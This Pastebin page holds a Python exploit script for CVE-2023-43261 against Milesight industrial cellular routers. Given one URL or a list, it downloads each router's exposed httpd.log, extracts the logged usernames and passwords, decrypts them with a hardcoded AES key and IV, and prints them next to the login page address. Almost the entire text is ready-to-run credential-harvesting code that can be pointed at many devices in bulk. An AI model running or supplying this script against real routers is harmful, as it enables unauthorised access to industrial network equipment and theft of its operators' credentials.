FlyFar

CVE-2023-43261

Feb 6th, 2024
77
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.43 KB | Cybersecurity | 0 0
  1. #!/usr/bin/env python3
  2. # -*- coding: utf-8 -*-
  3.  
  4. """
  5. Title: Credential Leakage Through Unprotected System Logs and Weak Password Encryption
  6. CVE: CVE-2023-43261
  7. Script Author: Bipin Jitiya (@win3zz)
  8. Vendor: Milesight IoT - https://www.milesight-iot.com/ (Formerly Xiamen Ursalink Technology Co., Ltd.)
  9. Software/Hardware: UR5X, UR32L, UR32, UR35, UR41 and there might be other Industrial Cellular Router could also be vulnerable.
  10. Script Tested on: Ubuntu 20.04.6 LTS with Python 3.8.10
  11. Writeup: https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf
  12. """
  13.  
  14. import sys
  15. import requests
  16. import re
  17. import warnings
  18. from Crypto.Cipher import AES # pip install pycryptodome
  19. from Crypto.Util.Padding import unpad
  20. import base64
  21. import time
  22.  
  23. warnings.filterwarnings("ignore")
  24.  
  25. KEY = b'1111111111111111'
  26. IV = b'2222222222222222'
  27.  
  28. def decrypt_password(password):
  29.     try:
  30.         return unpad(AES.new(KEY, AES.MODE_CBC, IV).decrypt(base64.b64decode(password)), AES.block_size).decode('utf-8')
  31.     except ValueError as e:
  32.         display_output('      [-] Error occurred during password decryption: ' + str(e), 'red')
  33.  
  34. def display_output(message, color):
  35.     colors = {'red': '\033[91m', 'green': '\033[92m', 'blue': '\033[94m', 'yellow': '\033[93m', 'cyan': '\033[96m', 'end': '\033[0m'}
  36.     print(f"{colors[color]}{message}{colors['end']}")
  37.     time.sleep(0.5)
  38.  
  39. urls = []
  40.  
  41. if len(sys.argv) == 2:
  42.     urls.append(sys.argv[1])
  43.  
  44. if len(sys.argv) == 3 and sys.argv[1] == '-f':
  45.     with open(sys.argv[2], 'r') as file:
  46.         urls.extend(file.read().splitlines())
  47.  
  48. if len(urls) == 0:
  49.     display_output('Please provide a URL or a file with a list of URLs.', 'red')
  50.     display_output('Example: python3 ' + sys.argv[0] + ' https://example.com', 'blue')
  51.     display_output('Example: python3 ' + sys.argv[0] + ' -f urls.txt', 'blue')
  52.     sys.exit()
  53.  
  54. use_proxy = False
  55. proxies = {'http': 'http://127.0.0.1:8080/'} if use_proxy else None
  56.  
  57. for url in urls:
  58.     display_output('[*] Initiating data retrieval for: ' + url + '/lang/log/httpd.log', 'blue')
  59.     response = requests.get(url + '/lang/log/httpd.log', proxies=proxies, verify=False)
  60.  
  61.     if response.status_code == 200:
  62.         display_output('[+] Data retrieval successful for: ' + url + '/lang/log/httpd.log', 'green')
  63.         data = response.text
  64.         credentials = set(re.findall(r'"username":"(.*?)","password":"(.*?)"', data))
  65.  
  66.         num_credentials = len(credentials)
  67.         display_output(f'[+] Found {num_credentials} unique credentials for: ' + url, 'green')
  68.  
  69.         if num_credentials > 0:
  70.             display_output('[+] Login page: ' + url + '/login.html', 'green')
  71.             display_output('[*] Extracting and decrypting credentials for: ' + url, 'blue')
  72.             display_output('[+] Unique Credentials:', 'yellow')
  73.             for i, (username, password) in enumerate(credentials, start=1):
  74.                 display_output(f'    Credential {i}:', 'cyan')
  75.                 decrypted_password = decrypt_password(password.encode('utf-8'))
  76.                 display_output(f'      - Username: {username}', 'green')
  77.                 display_output(f'      - Password: {decrypted_password}', 'green')
  78.         else:
  79.             display_output('[-] No credentials found in the retrieved data for: ' + url, 'red')
  80.     else:
  81.         display_output('[-] Data retrieval failed. Please check the URL: ' + url, 'red')
  82.            
Add Comment
Please, Sign In to add comment